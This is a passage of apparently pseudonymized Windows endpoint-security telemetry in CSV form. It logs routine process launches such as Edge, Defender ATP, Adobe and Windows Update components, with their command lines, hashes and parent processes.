00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1486,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:20:56.030403300+00:00,10688,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:20:56.109442700+00:00,2021-06-24 01:21:31.404052600+00:00,3d88245e-947d-4586-abf4-8eef227d68ff,computerpii_0a470890c60768167990033d701e7bd881398861,170550,True,10.7740.19041.1052,False,11540474045175158,,11540474045175593,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1487,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:20:57.720168200+00:00,19664,SenseCncProxy.exe,4012,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:20:57.760560500+00:00,2021-06-24 01:21:31.404524200+00:00,ae74ae74-c056-4886-95aa-ae77933f28af,computerpii_0a470890c60768167990033d701e7bd881398861,170559,False,10.7740.19041.1052,False,11540474045137006,,11540474045175595,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1488,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:57:37.971189600+00:00,3608,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_xcxwaq 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:57:38.139746500+00:00,2021-06-24 00:59:55.546153200+00:00,397b9fb5-b282-471e-8e1c-4dccd645bac1,computerpii_0a470890c60768167990033d701e7bd881398861,169431,False,10.7740.19041.1052,False,11540474045136991,,11540474045175366,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1489,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:57:37.994384300+00:00,14328,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:57:37.971189600+00:00,3608,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_xcxwaq 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:57:38.140693700+00:00,2021-06-24 00:59:55.546208700+00:00,b755cb07-5912-46f7-9f54-7f528d60d5e1,computerpii_0a470890c60768167990033d701e7bd881398861,169432,False,10.7740.19041.1052,False,11540474045175366,,11540474045175367,2021-06-24 00:57:37.971189600+00:00,3608,2021-06-24 00:57:37.971189600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3608,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1490,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:57:38.966621600+00:00,17864,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe742_ Global\UsGthrCtrlFltPipeMssGthrPipe742 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:57:39.331184800+00:00,2021-06-24 00:59:55.546320+00:00,379a97be-db18-4fc5-8c05-2c7ff9110aa4,computerpii_0a470890c60768167990033d701e7bd881398861,169434,False,10.7740.19041.1052,False,11540474045144190,,11540474045175368,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1491,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:57:39.297870300+00:00,3168,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_exthds 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:57:39.336302900+00:00,2021-06-24 00:59:55.546371200+00:00,d51f8168-1bb1-43af-a3d8-8a502a532c00,computerpii_0a470890c60768167990033d701e7bd881398861,169435,False,10.7740.19041.1052,False,11540474045136991,,11540474045175369,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1492,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:57:39.307761700+00:00,14796,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:57:39.297870300+00:00,3168,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_exthds 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:57:39.339532200+00:00,2021-06-24 00:59:55.546423700+00:00,4a48505f-12a3-40cd-8b70-8eb28db295e8,computerpii_0a470890c60768167990033d701e7bd881398861,169436,False,10.7740.19041.1052,False,11540474045175369,,11540474045175370,2021-06-24 00:57:39.297870300+00:00,3168,2021-06-24 00:57:39.297870300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3168,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:54:47.340761600+00:00,2020-09-22 19:30:00+00:00,16512,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1493,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:58:01.944503300+00:00,8472,SenseCncProxy.exe,3636,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:58:02.743127200+00:00,2021-06-24 00:59:55.546853600+00:00,5e3927c3-744b-4c2b-bb9e-3962109df894,computerpii_0a470890c60768167990033d701e7bd881398861,169444,False,10.7740.19041.1052,False,11540474045137006,,11540474045175371,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1494,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:58:08.708045700+00:00,13628,UsoClient.exe,"""usoclient.exe"" StartStoreUpdates",PortableExecutable,2021-04-14 01:10:15.165138700+00:00,C:\Windows\System32\UsoClient.exe,89600,cb83db7acb08ccd0370200eed9a1803b,278567a8a88fb508453c6e415eba46e1d23a419fc2d09992df95883c9f37cebb,76996171bfcbdfad71405cf376b1cd045a2fbb2e,fd33757fa1522b4555e8d8d61bd18a07,6d17958c6527346036f35c6d9db2f5c8d820cbfbd043588304c7beddf7ea8641,9a4803b5c0e1a33396a4c816dbe57369241f419c,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:48:10.634688500+00:00,13224,MoUsoCoreWorker.exe,mousocoreworker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:58:09.678965100+00:00,2021-06-24 00:59:55.547010300+00:00,bbcc4539-b749-40eb-b309-b8289f7a6778,computerpii_0a470890c60768167990033d701e7bd881398861,169447,False,10.7740.19041.1052,False,11540474045137196,,11540474045175372,2021-06-10 00:48:10.634688500+00:00,13224,2021-06-10 00:48:10.634688500+00:00,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,13224,18560,ActiveProcessStartkey,C:\Windows\System32,1553408,1990-07-31 23:15:30+00:00,2021-06-09 01:20:44.588993100+00:00,2021-06-10 00:48:10.654901200+00:00,2021-06-09 01:20:44.551541700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MoUSO Core Worker Process,MoUSOCoreWorker.exe,MoUSO Core Worker Process,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,UsoClient,UsoClient,UsoClient
+1495,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:58:12.881643300+00:00,18244,wuapihost.exe,wuapihost.exe -Embedding,PortableExecutable,2019-12-07 09:08:33.275369400+00:00,C:\Windows\System32\wuapihost.exe,11264,9e41b17e9be29c963e8ae84d42bceb45,ba77d5ebacbad0939b9ee667c59bcb7143a432be91522f4397d458e62f03eedd,9d37f7356576b1d8697fd790c18f278871ecc164,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:58:13.773397800+00:00,2021-06-24 00:59:55.547433600+00:00,f1ddc3cf-1aff-4d5c-a3b2-652b0541f73b,computerpii_0a470890c60768167990033d701e7bd881398861,169455,False,10.7740.19041.1052,False,11540474045136908,,11540474045175373,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,wuapihost,wuapihost.exe,wuapihost
+1496,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:22:13.112586100+00:00,11260,msoia.exe,"""msoia.exe"" scan upload mininterval:2880",PortableExecutable,2021-05-17 00:47:47.018542700+00:00,C:\Program Files\Microsoft Office\root\Office16\msoia.exe,5260200,1c5600cf684054412e3c22caf8992864,c86a878eb2113e7c3d470a42b0b829b3abfb1b7cbc50499e9d00709097470eaa,de354752cd9eb2705342b7e75d06d6a18e034add,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:22:13.293150500+00:00,2021-06-24 01:23:33.423538800+00:00,865d3ff5-f1b5-46db-a951-0eecddcba419,computerpii_0a470890c60768167990033d701e7bd881398861,170653,False,10.7740.19041.1052,False,11540474045136925,,11540474045175602,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20634,msoia,msoia.exe,Office Telemetry Dashboard Agent (OTD msoia)
